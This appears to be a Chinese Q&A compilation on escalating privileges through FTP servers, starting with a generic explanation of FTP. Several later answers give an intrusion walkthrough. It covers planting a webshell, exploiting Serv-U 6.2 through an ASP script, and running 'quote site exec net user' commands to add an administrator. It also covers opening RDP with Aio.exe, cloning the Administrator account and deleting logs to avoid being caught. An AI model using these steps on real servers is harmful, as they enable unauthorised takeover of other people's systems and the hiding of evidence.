提權ftp

⑴ 怎麼在unix的ftp提權

FTP工作原理 拿下傳文件為例，當你啟動FTP從遠程計算機拷貝文件時，你事實上啟動了兩個程序：一個本地機上的FTP客戶程序：它向FTP伺服器提出拷貝文件的請求。另一個是啟動在遠程計算機的上的FTP伺服器程序，它響應你的請求把你指定的文件傳送到你的計算機中。FTP採用「客戶機/伺服器」方式，用戶端要在自己的本地計算機上安裝FTP客戶程序。FTP客戶程序有字元界面和圖形界面兩種。字元界面的FTP的命令復雜、繁多。圖形界面的FTP客戶程序，操作上要簡潔方便的多。 簡單地說，支持FTP協議的伺服器就是FTP伺服器。 一般來說，用戶聯網的首要目的就是實現信息共享，文件傳輸是信息共享非常重要的一個內容之一。Internet上早期實現傳輸文件，並不是一件容易的事，我們知道 Internet是一個非常復雜的計算機環境，有PC，有工作站，有MAC，有大型機，據統計連接在Internet上的計算機已有上千萬台，而這些計算機可能運行不同的操作系統，有運行Unix的伺服器，也有運行Dos、Windows的PC機和運行MacOS的蘋果機等等，而各種操作系統之間的文件交流問題，需要建立一個統一的文件傳輸協議，這就是所謂的FTP。基於不同的操作系統有不同的FTP應用程序，而所有這些應用程序都遵守同一種協議，這樣用戶就可以把自己的文件傳送給別人，或者從其它的用戶環境中獲得文件。 與大多數Internet服務一樣，FTP也是一個客戶機/伺服器系統。用戶通過一個支持FTP協議的客戶機程序，連接到在遠程主機上的FTP伺服器程序。用戶通過客戶機程序向伺服器程序發出命令，伺服器程序執行用戶所發出的命令，並將執行的結果返回到客戶機。比如說，用戶發出一條命令，要求伺服器向用戶傳送某一個文件的一份拷貝，伺服器會響應這條命令，將指定文件送至用戶的機器上。客戶機程序代表用戶接收到這個文件，將其存放在用戶目錄中。 在FTP的使用當中，用戶經常遇到兩個概念："下載"（Download）和"上載"（Upload）。"下載"文件就是從遠程主機拷貝文件至自己的計算機上；"上載"文件就是將文件從自己的計算機中拷貝至遠程主機上。用Internet語言來說，用戶可通過客戶機程序向（從）遠程主機上載（下載）文件。 使用FTP時必須首先登錄，在遠程主機上獲得相應的許可權以後，方可上載或下載文件。也就是說，要想同哪一台計算機傳送文件，就必須具有哪一台計算機的適當授權。換言之，除非有用戶ID和口令，否則便無法傳送文件。這種情況違背了Internet的開放性，Internet上的FTP主機何止千萬，不可能要求每個用戶在每一台主機上都擁有帳號。匿名FTP就是為解決這個問題而產生的。 當遠程主機提供匿名FTP服務時，會指定某些目錄向公眾開放，允許匿名存取。系統中的其餘目錄則處於隱匿狀態。作為一種安全措施，大多數匿名FTP主機都允許用戶從其下載文件，而不允許用戶向其上載文件，也就是說，用戶可將匿名FTP主機上的所有文件全部拷貝到自己的機器上，但不能將自己機器上的任何一個文件拷貝至匿名FTP主機上。即使有些匿名FTP主機確實允許用戶上載文件，用戶也只能將文件上載至某一指定上載目錄中。隨後，系統管理員會去檢查這些文件，他會將這些文件移至另一個公共下載目錄中，供其他用戶下載，利用這種方式，遠程主機的用戶得到了保護，避免了有人上載有問題的文件，如帶病毒的文件。 作為一個Internet用戶，可通過FTP在任何兩台Internet主機之間拷貝文件。但是，實際上大多數人只有一個Internet帳戶，FTP主要用於下載公共文件，例如共享軟體、各公司技術支持文件等。 Internet上有成千上萬台匿名FTP主機，這些主機上存放著數不清的文件，供用戶免費拷貝。實際上，幾乎所有類型的信息，所有類型的計算機程序都可以在Internet上找到。這是Internet吸引我們的重要原因之一。 FTP 是上傳的. 簡單說，上傳下載文件，提高文件共享性。 微軟的iis可以提供ftp服務，不過功能不強。 可以選用伺服器軟體有：serv-u，現在版本為7.X

⑵ ftp怎麼提權拿伺服器 我有ftp的弱口令和密碼 小白就不要來了

並不是所有的ftp伺服器都可以提權的，要具體看採用的那個ftp的版本

⑶ 如何從webshell到FTP提權

應該是一個操作平台吧

⑷ 我可以進入網站的後台，請問如何能拿到網站的FTP許可權

FTP許可權我個人觀點有2種，
1 在後台想辦法上傳個後門馬，例如是asp的程序，你就放個asp的網馬。PHP就放PHP的馬。然後利用自己的馬，直接登入目錄管理，也就是webshell 簡稱 shell
2就是直接拿下伺服器，自然伺服器里的所有網站程序都包括在內的，全部在你控制內。
當然，說是簡單，其中涉及很多技術問題，例如，在後台中馬，即使中了馬有沒足夠的許可權去控制整個ftp目錄。這也就涉及到提權問題，我也只能說下簡單的規程，具體看漏洞的情況。

⑸ ftp提權的問題

開始 要提權 首先得看看這里 伺服器信息-組件支持 一般提權都會利用到這個
wscript.shell √ 命令行執行組件
在看看這里 開了終端了 有時候沒開也會顯示3389
個人愛好 提權的時候先看看有沒有FTP 還有有沒有開啟終端的
方法比較簡單 看操作 CMD裡面輸入命令FTP 目標地址 顯示Serv-U FTP Server v6.2
有開FTP 而且是6.2版本的 有利用價值 這個讓我們想到FTP的提權
連得上 說明開著 （小提示 如果沒連得上有可能是改埠了 也有可能是沒開 可以用掃描器掃一下）
接著上傳一個ASP的提權腳本 lake大哥的 大家都熟悉吧 都英文來的
我簡單說明一下就好了 Add User 這里是添加 Del User 刪除
RUN提交 上面的默認不用修改 FTP user lake pass admin123 添加了
FTP帳號 lake 密碼 admin123
連連 呵呵 進去了 說明添加帳戶成功 接下來呢 就添加管理員帳號了 如果沒開終端的話 也可以現在開
說明一下 現在添加的這個lake帳戶是具有管理許可權的哦 用到下面的命令
quote site exec net user shayu 83073645 /add添加用戶
200 EXEC command successful (TID=33).
成功 繼續添加許可權
200 EXEC command successful (TID=33) OK了
伺服器的3389已經被我開過了 我簡單演示一下怎麼開就OK了
用到一個工具AIO.exe 對了還得看看對方的機子是什麼系統才好開3389 我已經事先看了
集體的是在WEBSHELL裡面用CMD命令 VER 就可以知道了 沒許可權的話就自己傳個CMD過去
現在看操作 我用工具傳過去比較方便點
命令 quote site exec Aio.exe -Terminal 3389
在這里輸入 不過注意下 那個是FTP下運行的命令 所以要在前面加上quote site exec這個才可以
OK 開了 在用這個命令Aio.exe -Clone Administrator Guest 83073645克隆帳戶 也可以用之前的直接
登陸也可以 OK 到這里提權就完畢了 接下來的自由發揮了
走的時候別忘了擦PP咯 不然給人抓了 我可不管了 那邊的是我用GUEST帳號登陸的 忽忽
清楚系統的日誌掉了 可以的話 大家自己找找WEB的日誌還有FTP的都要刪除掉 我就不演示了
就到這里 88咯
相關命令：
Aio.exe -Clone Administrator Guest 83073645
Aio.exe -Terminal 3389
ftp提權命令:quote site exec net user shayu 83073645 /add
quote site exec net localgroup administrators shayu /add

⑹ 關於ftp的提權等問題

去論壇找吧 黑客防線或者黑鷹紅客基地都有

在這里得不到好的答案

希望不要做壞事哦

⑺ FTP的提權命令是多少·

quote site exec net user 用戶名 密碼 /add 添加用戶
quote site exec net localgroup administrators 用戶名 /add

⑻ 如何在伺服器上用微軟自帶FTP提權

微軟的ftp目前沒有提權的漏洞，只是在早期的2000系統的iss中有，但是早就不存在了。所以ftp提權放棄吧。限制的目錄跳轉只是禁止許可權繼承而已，還是從cmd
shell下手吧。

⑼ ftp弱口令掃描軟體-ftp破解工具---一定要【絕對神速】的

非常精闢的ftp客戶端。目前體積最小的FTP客戶端工具。
使用8uftp
涵蓋其它FTP工具功能
獨家支持多線程上傳，使上傳速度更快更穩定。
同時支持直接上傳壓縮包，可在空間上直接解壓。也可以在空間上壓縮後直接下載壓縮包。